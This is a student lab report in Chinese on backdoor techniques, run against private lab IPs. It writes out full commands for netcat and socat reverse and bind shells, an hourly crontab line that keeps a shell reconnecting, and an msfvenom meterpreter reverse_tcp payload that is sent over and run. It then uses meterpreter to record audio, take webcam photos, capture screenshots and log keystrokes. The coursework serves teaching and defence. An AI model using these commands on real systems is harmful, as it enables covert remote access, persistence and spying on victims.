2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

实验内容

1.使用netcat获取主机操作Shell，cron启动
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

基础问题

例举你能想到的一个后门进入到你系统中的可能方式？
答：收到以银行或者学校名义给你发过来的虚假邮件，打开邮件并且下载邮件的附件之后，后门程序可能会进入你的计算机。
例举你知道的后门如何启动起来(win及linux)的方式？
答：通过修改注册表设置为开机自启动；进入挂马网站；下载一些有恶意程序绑定的软件。
Meterpreter有哪些给你映像深刻的功能？
答：可以不用通过用户登录来访问计算机，并且随意进行开启摄像头，录制音频等操作。
如何发现自己有系统有没有被安装后门？
答：1.首先必须开启防火墙，而且防火墙对与某些危险操作的提示要仔细查看，不能疏忽。2.可以下载专业的杀毒软件(不要下载一些流氓软件如360)，进行定期检查电脑。3.可以检测某些不常用的端口是否长时间开启，如果长时间开启说明电脑有一定的几率被植入了后门或者是病毒。

实验过程

1.使用netcat获取主机操作Shell，cron启动

1.windows下获得一个linux shell

1.在Linux中使用ifconfig查看Linux的ip地址

2.在Windows中使用ipconfig查看本机ip地址

3.windows打开监听：ncat.exe -l -p 5235，Linux反弹连接win：nc 192.168.1.101 5235 -e /bin/sh，并且在Windows cmd下使用ls命令查看是否成功。

2.Linux 下获得Windows的cmd程序

1.Linux运行监听指令：nc -l -p 5235，Windows反弹连接Linux：ncat.exe -e cmd.exe 192.168.245.128 5235，在Linux shell下使用dir命令。

3.在Linux与Windows之间进行数据传送

1.Windows下监听端口：ncat.exe -l -p 5235，,Linux下连接到Windows的端口：ncat 192.168.1.101 5235，建立连接之后，就可以传输数据：

2.使用socat获取主机操作Shell, 任务计划启动

1.使用netcat获取主机操作Shell，cron启动

1.Windows中使用ncat.exe -l 5235监听5235端口
2.在linux中，使用crontab -e指令编辑一条定时任务，选择编辑器时选择3，在底行插入57 * * * * /bin/netcat 192.168.1.101 5235 -e /bin/sh（每个小时的第57分钟反向连接Windows的5235端口）

3.:wq保存退出配置即生效，可通过crontab -l查看：

4.在系统时间到57分钟，就会在Windows中监听的cmd中发现获得了Linux shell

2.使用`socat`获取主机操作Shell, 任务计划启动

1.win7系统中鼠标右击计算机：计算机管理->系统工具->任务计划程序->创建任务

2.常规中填写任务名称如：20165235。

3.触发器-新建新建触发器，（按照图中步骤进行）

4.点击操作，将2操作所指的改为 启动程序.

5.导入socat.exe的路径，并添加参数：tcp-listen:5235 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5235，同时把cmd.exe的stderr重定向到stdout上)

6.创建完成之后，按Windows+L快捷键锁定计算机，再次打开，运行之前创建的任务。

7.在Linux shell中输入socat - tcp:192.168.1.101:5235：

3.使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=5235 -f exe > 20165235_backdoor.exe,生成后门程序20165235_backdoor.exe

2.在Windows中使用ncat.exe -lv5235 > 20165235_backdoor.exe

3.Linux中输入nc 192.168.1.101 5235 < 20165235_backdoor.exe。传输成功并且在Windows的ncat文件夹下查看后门程序。

4.再打开新的shell，并且使用msfconsole进入msf控制台：

5.输入use exploit/multi/handler：
6.使用和生成后门程序时相同的payload：set payload windows/meterpreter/reverse_tcp：
7.设置ip：set LHOST 192.168.245.128
9.设置端口：set LPORT 5235
10.使用exploit开始监听
11.在Windows cmd 中相应文件夹中执行：20165235_backdoor.exe，Linux获得Windows主机的连接，并且得到了远程控制的shell：

4.使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.在以上的操作之上，使用record_mic可以截获一段音频：

2.使用webcam_snap可以使用摄像头拍照：

3.使用creenshot可以进行截屏：

4.使用keyscan_start 记录下击键的过程，使用keyscan_dump读取击键的记录：

实验中遇到的问题

1.错误一：在进行第一个实验时出现如下错误：

解决方法：在Linux使用ifconfig时出现很多地址，我很随意的填上去了一个，经过我仔细查看，将192.168.245.130写入运行成功。

2.错误：在使用`crontab -e`指令编辑一条定时任务时，发现win7端没有监听到Linux的shell

解决方法：因为在底部加入指令时没有将#取除掉。

实验总结与体会

通过本次实验我首先明白了什么是后门。（后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法）。同时也学会了后门的基本原理，按照学长学姐以及同学的博客的指导下完成实验，学会了使用多种后门工具，同时也学会了如何防范别人对计算机的后门植入。在以后的学习生活中要注意网上安全，留意恶意程序。本此实验也有一定的趣味性，在完成后门植入后会有些许的成就感。